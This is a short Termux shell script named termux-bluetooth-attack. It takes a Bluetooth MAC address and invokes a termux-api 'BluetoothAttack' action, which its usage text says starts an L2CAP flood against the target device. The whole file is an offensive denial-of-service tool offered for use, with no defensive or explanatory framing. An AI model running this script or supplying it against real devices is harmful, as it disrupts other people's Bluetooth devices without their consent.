#!/data/data/com.termux/files/usr/bin/sh
set -e -u

SCRIPTNAME=termux-bluetooth-attack
show_usage () {
    echo "Usage: $SCRIPTNAME <mac_address>"
    echo "Start a L2CAP flood against a bluetooth device."
    exit 0
}

if [ $# != 1 ]; then
    show_usage
fi

/data/data/com.termux/files/usr/libexec/termux-api BluetoothAttack --es mac_address "$1"